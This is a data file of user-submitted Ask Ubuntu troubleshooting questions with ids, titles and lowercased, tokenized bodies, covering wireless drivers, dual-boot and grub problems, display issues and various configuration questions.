474416	wifi is not working at all	i am using dell aspiron 5537 with ubuntu 12.04 . everything is working perfectly but only the wireless network is not working . i have tried most of the solutions but still is not working . the network controller is intel corporation wireless 7260 ( rev 73 ) below is the details of my wireless information # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise # # # # # kernel # # # # # linux obedier 3.8.0-41-generic # 60~precise1-ubuntu smp fri may 16 00:18:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 07 ) subsystem : dell device [ 1028:05e9 ] kernel driver in use : r8169 02:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b1 ] ( rev 73 ) subsystem : intel corporation wireless-n 7260 [ 8086:4462 ] # # # # # lsusb # # # # # bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 010 : id 04e8:6863 samsung electronics co. , ltd bus 001 device 004 : id 8087:07dc intel corp . bus 001 device 005 : id 04f3:0034 elan microelectronics corp . bus 001 device 006 : id 0bda:0129 realtek semiconductor corp . bus 001 device 007 : id 0c45:64ad microdia # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : hci0 : bluetooth soft blocked : no hard blocked : no # # # # # iw reg get # # # # # # # # # # interfaces # # # # # auto lo iface lo inet loopback # # # # # iwconfig # # # # # # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.42.129 0.0.0.0 ug 0 0 0 usb0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 usb0 192.168.42.0 0.0.0.0 255.255.255.0 u 1 0 0 usb0 # # # # # resolv.conf # # # # # nameserver 127.0.0.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : usb0 [ wired connection 2 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : rndis_host state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : on ipv4 settings : address : 192.168.42.16 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.42.129 dns : 192.168.42.129 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # # # # # # iwlist channel # # # # # # # # # # lsmod # # # # # rndis_wlan 37640 0 cfg80211 526422 1 rndis_wlan rndis_host 13855 1 rndis_wlan usbnet 32038 3 rndis_wlan , rndis_host , cdc_ether # # # # # modinfo # # # # # # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac # # # # # udev rules # # # # # # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.0/0000:01:00.0 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # # # # # dmesg # # # # # # # # # # # # # # # wireless info end # # # # # # # # # # # # also `` sudo modprobe iwlwifi '' nothing happens
474418	can shotwell display gps location data for example using google maps ?	i am in the process of migrating from many years of using iphoto to shotwell ( the main reason being that i fed up with the vedor-lockin of apple even though iphoto itself is a good tool ) . i realize that iphoto has had a head start and that it therefore has features that shotwell does not have . overall i am very impressed with the current state of shotwell so far and really hope that it can see a lot more development . in iphoto you could have a small map display little pins based on the gps location data in the exif information of images . can shotwell display something like this ?
474421	ubuntu touch dualboot dualboot.sh install problem	i 'd like to install ubuntu touch to my nexus 7 ( 2012 ) but i ca n't because dualboot.sh wo n't be install . this is in my terminal marci @ marci-desktop : ~ $ chmod +x dualboot.sh marci @ marci-desktop : ~ $ ./dualboot.sh full using passed device id : full waiting for device full to install ubuntu installer to . error : device not found error : device not found connected device is not supported but my device is connected marci @ marci-desktop : ~ $ adb devices list of devices attached 015d257858642010 device what can i do ?
474425	wireless does not work 14.04 laptop model mm061	wireless network not working ( built-in adapter ) i ca n't see any network but in windows it is working . so i should use a ( network external adapter ) and i can see the network and access to the web . now i want make my ( built-in adapter ) works like an external adapter . i tried to restart & re-install & software updater . but the problem is still existing . edit : the problem has been solved by this question .
474427	how do i install and uninstall kubuntu desktop environment ?	i just want to try kde . how do i install it through the command line ? if i do n't like it , how do i uninstall it through the command line ?
474435	desktop configuration file errors in folderview screenlet	i have copied desktop configuration files/desktop shortcuts into folderview screenlets . these files/shortcuts were copied from the desktop folder , and they do work there . some work from within folderview for example scratch , artha , etc . however others , like all the libra applications give me the error : `` /home/user/ % u does not exist '' and do not open at all . some applications like geogebra give me the error : `` file not found : /home/user/ % f '' but opens after clicking ok . if i go to these folderview folders via file manager pcmanfm , i do not have any issues starting these applications .
474440	not seeing some directories in windows partition	i installed xubuntu 14.04 in dual boot with windows 7 in a lenovo g480 laptop . i 'm having the following issue : i ca n't see ( literally ) a couple of directories which are in the win partition . to be more precise , i mount the ntfs partition and need to read/write the c : /users/my_win_user/documents and another folder with data ( c : /data ) , but i ca n't find them even from terminal doing ls or from the file manager . i do n't know what i 'm missing ... i tried mounting the partition with : sudo mount -t ntfs-3g -o -rw /dev/sda2 /media/win and sudo mount -t ntfs-3g /dev/sda2 /media/win -o `` umask=022 '' both with the same issue . as a test , i copied the data folder from windows to an external hdd ( ntfs ) , then mounted in xubuntu and i can see and read/write the directories without any problem . i ca n't realize what i 'm doing wrong ... i searched in enter code herethe forum but could n't find the same problem posted . thanks to everyone !
474444	make a preview render for a piece of the video in kdenlive	kdenlive normally makes preview renders in real time ( just by pressing space ) . the thing is ; my computer is n't powerful so kdenlive keeps dropping frames just to keep the preview real time . the preview looks awful . i used to use adobe premier . it had another way to preview . you could just render a piece of the video before previewing it ( by pressing zero on the numeric keypad ) and then press again preview it without having to drop frames . is it possible in some way to do that in kdenlive ? ... well if not , does anyone know a workaround ?
474446	network goes down and does not come back up on it 's own	i have a server with the following /etc/networking/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address < my ip > netmask 255.255.255.248 gateway < gateway assigned by host > dns-nameservers 8.8.8.8 8.8.4.4 this all looks okay to me . however , occasionally , the server will stop responding . when i log into it , eth0 is up , but only for an ipv6 address that i do n't recognize . running ifdown -a ; ifup -a brings it back up to the right ip . how can i make sure that this would happen automatically ? edit : at about the time it went down , there were a few possibly related entries in /var/log/syslog : may 29 15:28:13 main-www dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 1 may 29 15:28:14 main-www dhclient : no dhcpoffers received . may 29 15:28:14 main-www dhclient : no working leases in persistent database - sleeping .
474452	moving icon at the bottom of the launcher	is there a way to put icon ( for example `` show desktop '' ) at the bottom of the launcher , above or under recyclebin icon ? i 'm using ubuntu 14.04 with unity . here is a picture i created to show what i mean .
474453	ubuntu 14.04 remove ibus but system setting disappear	i used to remove ibus and install fcitx for typing chinese.but this time when i remove ibus , it automaticly remove these things ibus ibus-table ubuntu-desktop unity-control-center unity-control-center-signon webaccounts-extension-common xul-ext-webaccounts how can i remove ibus only ?
474455	mutt - allow encrypt to key selection and disable sent folder encryption	i 've got mutt setup to use gpg and my default keys . seems to be working . i used the information found here : http : //dev.mutt.org/trac/wiki/muttguide/usegpg and the default gpg.rc file for this . in my .muttrc file i placed this : source ~/.mutt/gpg.rc set pgp_use_gpg_agent = yes set pgp_sign_as = keyid set pgp_timeout = 3600 set crypt_autosign = no set crypt_replyencrypt = no set pgp_verify_sig = no set fcc_clear = no i 've got two problems with this . it always encrypts my local copy to the sent folder , i want the local copy to stay unencrypted . i found the set fcc_clear option but it 's set and not working . i would like to be able to confirm which key is able to unencrypt at send . to encrypt and send i hit p then e to encrypt , not inline . but it does n't confirm who it 's encrypting to in the resulting screen , it just add 's pgp to the security line . i then hit the normal y to send . it sends . i 've found this key hook crypt-hook pattern keyid but ca n't figure out how to use it to allow me to confirm/select which key is the recipient . i have searched google over and around but ca n't find anymore documentation on that hook other than this : http : //www.rdrop.com/docs/mutt/manual41.html
474456	kubuntu 14.04 hangs at startup after installing fglrx	after installing the new amd catalyst beta driver ( 14.6 ) , my system hangs at the boot screen , however i am able to access the tty terminals . i installed fglrx as follows : downloaded the drivers from amd 's official site generated the .deb packages using the -- buildpkg option installed the generated packages ran sudo amdconfig -- initial i have also tried deleting and modifying the xorg.conf file , but for some reason it gets overwritten on every reboot . does anyone have an idea on how to solve this issue ? i am very frustrated with this problem and would greatly appreciate any help . i do not want to use the open source drivers . i am trying to install and run the proprietary amd driver , nothing else .
474458	14.04 , unity not working after upgrade kernel to 3.13.0-27	after installing new kernel update unity is not loading . just blank screen without unity panel . i have tried to delete unity and compiz config files , and to reinstall unity , but there is no result . i also tried to boot with older kernel , but there is the same situation with unity . if in terminal ( ctrl+alt+f1 ) try to run unity command , then will be message warning : no display variable set , setting it to :0 i also checked if the video driver installed by runing lshw -c video , and the driver was mentioned there . how to solve this problem ? maybe i need to reinstall video driver ( but i do n't know how to reinstall built-in driver for my intel hd graphics 4000 ) , or maybe something wrong with xorg ...
474461	single-monitor workspaces on multiple monitors	i have a dual monitor setup , running 14.04 . i would like workspaces only on my primary monitor , with no workspace switching on the secondary monitor . none of the simple fixes seem to do this . any suggestions ?
474462	vidalia wo n't start	i have installed tor and vidalia using sudo apt-get install tor vidalia but when i click on vidalia from the unity launcher , nothing happens . why is that ? what 's the problem ? thanks . p.s . i 'm using ubuntu 14.04 .
474463	ssh user client config with host wildcards	i have this in my ~/.ssh/config file : host jupiter hostname jupiter.engin.x.edu user rob host *.engin.x.edu user bladex local user is 'rob ' and i want to use the username 'bladex ' for every host in the engin.x.edu sub-domain . but this is n't working , typing `` ssh host.engin.x.edu '' responds with `` rob @ host.engin.x.edu 's password : '' what am i doing wrong ? my resolv.conf includes `` search engin.x.edu '' .
474465	how am i expected to scroll fine distances if i ca n't change the scroll distance or middle-click and drag to scroll ?	i ca n't find anything for this , i use a dell usb mouse , no special buttons or hardware , i regularly need to be able to scroll by couple-pixel distances , mostly in chrome , but for my sanity the ability to do it in everything else would be extremely helpful , according to other questions i found , i ca n't just change the number of scroll lines and the middle-click scroll is apparently taken up by xclipboard or something , what do i do ? i 've run out of ideas , i just came from windows , where this was solved by autoscroll on middle-click and drag , and the ability of my laptop in particular to scroll by 1 pixel in any direction by using the numberpad arrows system-wide .
474470	how do i copy a package from debian to my ppa ?	i 'd like to add the latest gourmet package from debian sid to our team 's ppa so ubuntu users who would like to run an up-to-date version of gourmet can add that ppa to their software sources . ( dependency-wise , that should n't be much of an issue as pretty much all our current dependencies are already available in all currently supported ubuntu versions . ) i 've downloaded the *.dsc file and debian and orig tarballs , and even figured out i could use this for the package 's source.changes file . i also downloaded the debian maintainer 's public key so dput can validate the package . i then tried to upload the package to our ppa using dput ppa : ~gourmet/ppa gourmet_0.17.3-1_source.changes ( i also tried without the tilda . ) this seemed to succeed , but i did n't get a confirmation email , and no packages are now displayed at our ppa , which leads me to believe that the package was rejected because the debian maintainer 's key is obviously not among our team members ' keys . so what 's the easiest way to `` copy '' a package from debian ( sid ) to a launchpad ppa ? do i really need to rebuild the entire package locally before i can upload it ?
474475	bcm4331 wireless causes graphics corruption on macbook pro 10,2	i have a macbook pro 10,2 and just installed 14.04 . everything seems okay except when i enable the wireless driver for the bcm4331 i get intermittent graphics corruption . it looks like the screen loses horizontal sync . if i disable the driver , the graphics looks great . has anyone else seen this ?
474478	desktop background will not load after performing aticonfig -- adapter=all -- ovt=opengl	i am trying to get eagle to work on ubuntu 14.04 lts . when i run eagle and open a schematic the display is not refreshing/redrawing correctly . one solution that i found was to install the flgrx drivers and do the aticonfig command to use opengl ... so i did and rebooted . now when i turn on my laptop i get all the way to the login screen , login , and then nothing happens , it just goes to the background image with no icons or anything ... i tried deleting and copying the original xorg.conf file and no results ... what do i do other than reinstalling ubuntu ? is there anyway to force the original driver ?
474479	which is the most user-friendly installation of ubuntu for sony vaio vgn-z21wn ?	my father has given me a sony vaio vgn-z21wn laptop . it has an intel centrino 2 ( duo ) 2.53 ghz processor and 3gb of ram . i have installed ubuntu 10.04 on a dell latitude before and despite having difficulties getting the wireless driver to work ( initially ) , it did end up being a fairly straight-fordward installation . i would like whichever version of ubuntu to work well on this sony vaio so i am wondering : which version of ubuntu should i install for a mostly trouble-free installation and usage ? are there any issues i should be aware of before i proceed with the installation . as i have had compatibility issues with formatting when using openoffice in the past , i might like to use microsoft office in the future ( e.g . excel and word ) . would it therefore be possible to partition the hard drive and install windows xp on one partition , and ubuntu on the other ? if so , will this be difficult to achieve ? will this sony vaio laptop be compatible with a 64-bit installation and operating system ? many thanks for your input .
474480	accidentally deleted my windows 7 while installing ubuntu , trying to reinstall it	i had windows 7 ultimate on my desktop and i believe have downloaded the correct iso file . i 've been trying to use gparted and unetbootin to create a bootable usb by formatting to fat32 , flagging the boot box , and writing to the flash drive with unetbootin , but there have been problems . when i select my flash drive in the bios , it just reflashes the bios stock msi picture 4 times then boots to ubuntu anyway . details : it 's a new computer , self-built , has n't shown any problems in the past , got windows 7 through r/softwareswap so it 's a msdn file , the flash drive is a sandisk u3 cruzer , i uninstalled the bloatware when iwas using windows 7 , but in the bios it still comes up as `` sandisk u3 cruzer '' i do n't have a ccd/dvd drive . i dont care if i have to completely delete ubuntu in the process , i just need windows 7 back by monday . i think the problem is because of the cruzer and am going to pick up a different flash drive today .
474481	usb-installed ubuntu 14.04 boot : cursur on line2 nothing else	hp dv7-6b00et 8gb ram i disconnected the hard drive and booted with a live cd . installed ubuntu 14.04 on sandisk extreme 32gb , restart blue screen . must be mauael power off . fuduntu installed on usb ( sandisk extreme 16gb ) boots ok.this record done with fuduntu . installed ubuntu 14.04 boots on samsung n150 netbook ok livecd/dvd and liveusb boots ok. win7 repair cd/usb boots ok my pc has an insyde h20 v3.5 bios and uefi boot files in windows7 . any suggestion as next/test welcome . thanks orhan
474482	14.04 64 bit memory use	when i start the os i have half of the memory used ( 1gb ) and now with chromium open this is the output of free : piero @ piero-vostro-400 : ~ $ free total used free shared buffers cached mem : 2039100 1462192 576908 195168 53136 672424 -/+ buffers/cache : 736632 1302468 swap : 2084860 0 2084860 with thunderbird open and editing a libreoffice document the hard disk starts swapping continuously and the os becomes really slow with a lot of freezes : piero @ piero-vostro-400 : ~ $ free total used free shared buffers cached mem : 2039100 1962188 76912 309484 29264 919964 -/+ buffers/cache : 1012960 1026140 swap : 2084860 0 2084860 what i can do ? better to install a 32 bit version with this amount of memory ?
474484	ubuntu 14.04 glibc_2.17	i have a problem , trying to run bash script version `glibc_2.17 ' not found ( required by /usr/lib/i386-linux-gnu/libstdc++.so.6
474485	commands to run when connecting hdmi	everytime i connect my pc to my tv using my hdmi cable ( to watch my movies ) , i have to manually go to : 1- monitors , to select `` mirror '' screen to hdmi 2- sound , to select the hdmi as default sound output 3- screen off an lock , to avoid screen locking while watching a video . is there a way i can automate this ? or at least write a script with commands that will do this . ( i could manually run a script every time i connect my hdmi , and then run annother one to undo the changes later ) how can i do these actions from a command line ?
474488	where can i download eclipse source code ?	i 'm searching for the eclipse 4.3 source code , in order to put it on my ppa , but after hours of search , i still ca n't find it . can someone help me ?
474489	i cant get back into ubuntu after turning off my acer c710 chromebook	i took about 1 hour installing ubuntu to my acer chrome book . i turned off my computer and now it boots back into chrome os ( yes i know its supposed to ) then i went onto the chrome os dev terminal thing and put in the code sudo cgpt -i 6 -p 5 -s 1 /dev/sda . nothing happens it comes up with another local host slot . i tried using the ctrl alt f2 and ctrl alt f3 but nothing happened . i really need to get back onto ubuntu . all help is appreciated .
474493	ubuntu installation time problem	i am installing ubuntu and i am stuck at a point . the step is when it is asking me to select partition . it is showing me error : '' no file system is defined please correct this from partitioning menu '' . i am getting this error when i am clicking `` install '' . i want ubuntu to install in /dev/sda7 which is 226727 mb . i have windows 8 in my system and i want to dual boot the system . so how to correct this error ? i want to allocate this whole partition to ubuntu only . secondly , what should i put in the option : `` device for boot loader installation '' ? by default it is somewhat like this : `` ata wdc wd5000 ... '' something like this . please tell my both these questions . i would be very thankful to you . thanks .
474496	why does the `` all settings '' button in unity-control-center have no effect ?	i have installed a fresh ubuntu 14.04 desktop system . i have n't configured anything yet . thus , the very first action was to start the unity-control-center by clicking on the gears icon . then , i clicked on the `` all settings '' button but it has no effect . instead , i expected more settings options to appear . when i start the program on the command line , it does not print any error messages .
474498	what is the command that pgdn / pgup executes ?	by that i mean is there a command i could type into the terminal then click on a window behind , and it is scrolled up / down , and then turn this into a custom shortcut ? xdotool key next or xdotool key page_down is not what i want , i 'm looking for one that is metaphorically 'deeper ' in the way linux / general oss works . i know how to use xdotool , but i do n't want to use it . i want to know the command that is executed when that button is pressed , xdo words as an emulator essentially .
474499	screen tearing on rotated screen in 14.04	with up-to-date intel drivers ( hd4000 ) on ubuntu 14.04 with unity , rotating the screen xrandr -o leftbreaks the vsync and induces a lot of tearing ( mostly vertical one when dragging a window ) , i get no tearing on a non-rotated screen . the tear-free option seems disabled : $ cat /var/log/xorg.0.log | grep tear [ 18.316 ] ( ** ) intel ( 0 ) : `` tear free '' disabled but in 14.04 , i ca n't find a xorg.conf with the intel device configuration to pass the tearfree option .
474502	how do i uninstall a software that was not installed using the ubuntu software center ?	i see there are discussions addressing installing software using the usc ( as well as some comparisons to the add/remove programms feature in windows ) , but nothing regarding how one goes about deleting/uninstalling software ( such as google chrome ) that was not installed using the usc ( and therefore , is listed in neither the usc nor is it present in the installed list in unity ) .
474503	cloning a usb stick	make a dd backup of the dm-crypt usb and rest the test the backup i know i can make a copy of a usb stick using the following sudo dd if=/dev/sdb of=~/usb_image and then restore it using sudo dd if=~/usb_image of=/dev/sdb my question is , is it possible to get rid of the image step or pipe the copy directoy from 1 usb to another ? so basically , to copy directly from 1 usb stick to another .
474511	connecting to ubuntu host not possible	i have an ubuntu-host which is connected via wlan ( and for testing to wired net ) to a local net . this ubuntu-host is not reachable via network by any other clients on the same network . but : if i do a ping from the ubuntu-host to the client which is attempting the network connection it works and afterswards the client is able to connect to the ubuntu-host . after a short period of time however the connection will be disconnected again by the ubuntu-host ( for example within an active ssh session ) . and i have todo the ping-thing again and reestablish the connection . i have tried : putting ubuntu-host in wlan/wired network disabled ubuntu-host firewall ( s ) ( also checked iptables ) trying different clients on wlan/wired with different oses ( win7 , win8 , archlinux , ubuntu ) does n't occur on windows on the same machine as the ubuntu-host checked routing tables ( fine ) checked network settings ( fine ) checked home router ( fine ) checked arp ( not sure ) my guess is that something is broken with the arp cache/network stack , since everything works in general and the connection can be opened for a short period by doing a ping from ubuntu-host to x . any ideas what can cause this behaviour ?
474515	install 14.04lts server on hp dl585 g7	ubuntu says that the dl585 g7 is certified to work with 14.04lts server amd64 . http : //www.ubuntu.com/certification/hardware/201403-14907/ the install goes fine up until the end when it tries to load grub onto the hard disk . i 'm not installing on the sd card , i 'm using the only hard disk in the system . ( 1tb drive that came with the chassis ) . it considers this a fatal error and i see no way of recovering . i can install it on the sd card , but there 's only 8gb there and it 's already got another os there that i would rather not get involved with . i would rather not install any boot loader and have it just boot right from the hard disk - which is easily settable in the bios .
474520	what is the most efficient desktop to install with mini.iso ?	i have a friends previously xp machine , that is about 10 years old . it only boots through cd but i 've made two different cd-r 's with lubuntu and it wo n't take . i do get mini-iso to load , and have installed lubuntu , but is there a more efficient desktop than lubuntu-desktop ? the computer has 256mb ram , and when i had lubuntu-desktop installed half of it was used up by the desktop . the machine loads chrome well enough and plays youtube videos barely , but getting movies to play through xbmc/vlc is almost impossible ( even logging out and logging in directly to xbmc ) . so is there any other desktop i can install other than sudo apt-get install lubuntu-desktop that would allow the computer to browse/watch movies .
474523	`` dirty files '' failure printing with samba	after several attempts with two thinkpads to get my hp-printer running under samba i gave up . i followed all instructions for adding a new printer . on my two thinkpads , one with newly installed ubuntu 14.04 i get the message : nt status disk operation falied opening remote spool test page . the error log : page 1 ( scheduler not running ? ) cups_connection failure : false page 2 ( choose printer ) : cups-dest : cups.dest hp-officejet-pro-8500-a909a cups instance : none cups queue listed : true page 3 ( check printer sanity ) cups device uri scheme : u'smb and so on , i hope i can skip some lines , then cups printer remote : false is cups class : false and later : cupsdsetbusystate : newbusy= `` dirty files '' , busy= `` active clients and dirty files '' cupsd is not idle any more , cancelling shutdown
474526	icedtea-7-plugin do n't work in chromium , does n't show in about : plugins	i 'm newbie user of ubuntu 14.04 . i have trouble with : icedtea-7-plugin do n't work in chromium . it does n't shows in about : plugins . how i can i fix it ? i did : sudo apt-get install icedtea-7-plugin cd /usr/lib/chromium-browser/plugins this was good . but when i try to do , next action : sudo ln -s /usr/lib/jvm/java-7-openjdk-amd64/jre/lib/amd64/icedteaplugin.so i saw this error : ln : failed to create symbolic link â./icedteaplugin.soâ : file exists how can i fix this ?
474528	ubuntu installation was well , but rebooting failed	the installation of ubuntu went well on my computer . after that , the system rebooted . however , it stucks on : error : file not found grub- > resuce i have only ubuntu on this computer . no other operating system . i tried to use a livecd but i was not able to use lot of commands with it . ls ( hd0 , msdos1 ) outputs error : bad filename ls ( hd0 , msdod5 ) set prefix= '' ( hd0 , msdos5 ) /boot/grub outputs : nothing insmod ext3 outputs : uknown filename set root= '' ( hd0 , msdos5 ) outputs : nothing how can i resolve this problem ?
474536	unable to mount d-link usb data modem	i am an ubuntu user and using the version 13.10 . i have a usb data modem of d-link which i recently purchased . for first time i tried to connect it to my ubuntu laptop two days ago and it was detected as medium /dev/sr1 , but i did not mount it then and thought of doing it some other day . product url is http : //www.dlink.co.in/products/ ? pid=654 and today again , i connected the device to usb port and there are no files showing in /dev/sr* but still the device is showing in lsusb and usb-devices commands ======================= lsusb | grep -i d-link bus 003 device 024 : id 2001:7d01 d-link corp. usb-devices | grep -i d-link s : manufacturer=d-link , inc s : product=d-link dwp-156 root @ vaiocyber : ~ # ll /dev/ | grep sr lrwxrwxrwx 1 root root 3 may 30 21:06 cdrom - > sr0 srw-rw-rw- 1 root root 0 may 30 20:36 log= brw-rw -- -- + 1 root cdrom 11 , 0 may 30 21:06 sr0 i already tried to mount /dev/sr0 but no medium found mount /dev/sr0 /media/john mount : no medium found on /dev/sr0 ======================= do you have any work around to fix it . please check and shed some light to fix the issue : ( thank you
474539	wrong resolution on ubuntu 14.04	i have installed ubuntu 14.04 lts on my system . my graphics card is an nvidia 8800gts . for some reason ubuntu detect that my screen resolution is up to 1024x1280 . i have already installed the nvidia drivers with no success . the resolution went to 640x480 . i tried to use solutions with xrandr but no success . my monitor is shown that is connected on port dvi-i-0 . how can i fix that issue ? my monitor works fine on windows and on ubuntu 12.04 lts .
474543	how to replicate one ubuntu system to other ubuntu system as it is	in my system i have installed ubuntu 12.10 ( consider as system a ) . also i have set up another system with ruby and some other system configuration like important drivers and all the other api that required for me . ( consider i have set up one ruby project in my ubuntu system ) . now i have another ubuntu 12.10 ( system b ) system . i want to copy or get whole set up of system a to the system b so that i do n't required to re-set up my b system . is there any way that i can get one system setup to the another system ( replicate the system ) as it is ? thanks in advance .
474544	nginx.conf not properly restarting	we had altered our nginx.conf file to redirect all urls to their www alternatives . later , we removed the lines responsible for this functionality . however , even after running sudo service nginx restart , the www redirect continues . strangely , even when we run sudo service nginx stop , the nginx server continues serving . according to service nginx status , nginx is not running . however , when i run ps -ef |grep nginx , there 's a line : deploy 1473 1251 0 12:58 pts/0 00:00:00 grep -- color=auto nginx when i try to kill this with kill -9 1473 , i get the error : -bash : kill : ( 1473 ) - no such process running ps -ef |grep nginx again , i see : deploy 1478 1251 0 12:59 pts/0 00:00:00 grep -- color=auto nginx the pid has changed . any idea what 's going on ?
474545	minicom not recognizing the usb modem	when inserting the usb gsm modem huawei k3565 , the network manager recognize it and i 'm able to activate it from the network manage , but when runin the minicom it says : minicom : can not open /dev/modem : no such file or directory but when executing the command : # wvdialconf /etc/wvdial.conf the result # found modem on /dev/ttyusb0 what i 'm missing or what is the problem
474546	is there a command to scroll ?	other than using xdotool is there a way to scroll down by a set amount using a command . in other words , what is the scrolling command ? i 'm not looking for a keyboard shortcut , i want a command for scrolling by say 10px in the currently focussed window . i also do n't want xdotool because i need the `` deeper command '' , what is `` executed '' when the wheel is rolled .
474549	got nodata issue : 'nodata ' ( does the network require authentication ? )	recently , i have ubuntu 14.04 desktop installed on my laptop , i can use my mobile broadband to access internet with firefox but when i want to install any package from terminal or make 'apt-get update ' command i got the following error : got 'nodata ' ( does the network require authentication ? ) **i 'm still did n't make any modification to the system . **the same ubuntu.iso was installed on vmware and it was worked well with the same mobile broadband . **i have no proxy and i can make internet ping from terminal . **i did n't find efficient solution from the same questions on ask.ubuntu** apt-get update output : get:1 extras.ubuntu.com trusty inrelease [ 213 b ] 98 % [ 1 inrelease gpgv 213 b ] [ connecting to archive.ubuntu.com ] splitting up /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_trusty_inrelease into data ign extras.ubuntu.com trusty inrelease e : gpg error : extras.ubuntu.com trusty inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) output of `cat /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_trusty_inrelease < ! doctype html public `` -//w3c//dtd html 4.0 transitional//en '' > < html > < head > < title > 404 < /title > < meta http-equiv= '' cache-control '' content= '' no-cache '' / > < /head > < body > < p > not found < /p > < /body > < /html > – output of wget : wget -o - http : //extras.ubuntu.com/ubuntu/dists/trusty/inrelease -- 2014-06-01 09:23:35 -- http : //extras.ubuntu.com/ubuntu/dists/trusty/inrelease resolving extras.ubuntu.com ( extras.ubuntu.com ) ... 91.189.92.152 connecting to extras.ubuntu.com ( extras.ubuntu.com ) |91.189.92.152|:80 ... connected . http request sent , awaiting response ... 200 ok length : 213 [ text/html ] saving to : ‘stdout’ 0 % [ ] 0 -- .-k/s < ! doctype html public `` -//w3c//dtd html 4.0 transitional//en '' > < html > < head > < title > 404 < /title > < meta http-equiv= '' cache-control '' content= '' no-cache '' / > < /head > < body > < p > not found < /p > < /body > < /html >
474551	upgrading from 14.04 to 14.04 lts	currently running 14.04 ( development branch ) but want to go to 14.04 lts . will a do-release-upgrade do this for me ? user @ host : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu trusty tahr ( development branch ) release : 14.04 codename : trusty
474555	ubuntu 14.04 64 bit installation in dual boot	i have tried various versions of ubuntu , trying to dual boot with win8 on my laptop , but then either the installation does not take place or something wrong happens after it ( i tried 12.04.2 and 12.04.3 before ) . this time i am installing 14.04 - 64 bit in dual boot . please tell me how do i do it . i created a separate unallocated space of 53 gb from win8 , and installed ubuntu in it , and 100mb for swap space . now i have two ubuntu options in boot menu , whenever i boot into any one of it , it goes to purple screen , and then shows `` ubuntu with linux 3.13.0-24-generic '' and the other is `` ubuntu with linux 3.13.0-24-generic ( recovery mode ) '' . the first one does not work while the second leads to ( after a few screen blinks ) `` the system is running in low graphics-mode . your screen , graphics card and input device settings could not be detected correctly . '' on pressing [ ok ] , it leads to console ( command-prompt like black window , the terminal ) which asks me for `` username '' and `` password '' . after entering them , still it does n't load ubuntu desktop . if i try to install a package like '' sudo apt-get install sensors '' says : e : unable to locate package sensors ( even though i am connected to internet ) the only way i can load ubuntu is by entering commands : sudo apt-get install -- reinstall ubuntu-desktop sudo reboot after restart it directly loads to ubuntu desktop and asks for password . but the real problem starts here : when i checked the temperatures it shows temperature reaching 59-60 deg celsius ( while on win8 its always below 53 ) ; and most importantly after about 30min of running ubuntu , the notebook becomes very hot . i know it is a graphics driver issue but i am unable to solve it . i tried the following commands : df -h sudo lshw -c display sudo lshw -short -c memory please help me out , i 'll provide as many details as possible , i am very much interested in working on this os and want to contribute to the open source software , but each time i get stuck at installation of ubuntu . i 've tried installing fedora also , but that too did not work . i am sorry i ca n't post any image here as i lack the required minimum reputation , i 'll type the complete result of each command soon .
474556	hiding output of a command	i have a script where it checks whether a package is installed or not and whether the port 8080 is being used by a particular process or not . i am not experienced at all with bash , so i did something like this : if dpkg -s net-tools ; then if netstat -tlpn | grep 8080 | grep java ; then echo `` shut down server before executing this script '' exit fi else echo `` if the server is running please shut it down before continuing with the execution of this script '' fi # the rest of the script ... however when the script is executed i get both the dpkg -s net-tools and the netstat -tlpn | grep 8080 | grep java outputs in the terminal , and i do n't want that , how can i hide the output and just stick with the result of the ifs ? also , is there a more elegant way to do what i 'm doing ? and is there a more elegant way to know what process is using the port 8080 ( not just if it 's being used ) , if any ?
474562	how to fix ubuntu partition ?	i had ubuntu installed , after installing windows 7 and trying to fix windows bootloader ( using easybcd ) , my ubuntu partition is damaged.this is screenshot of gparted : /dev/sda3 extended is recent ubuntu partition . all context menu options are disabled but information and manage flags . information status is busy . i have some important files on ubuntu . how can i fix it ? the installer detect /dev/sda3 as free space and get following error on trying to use it :
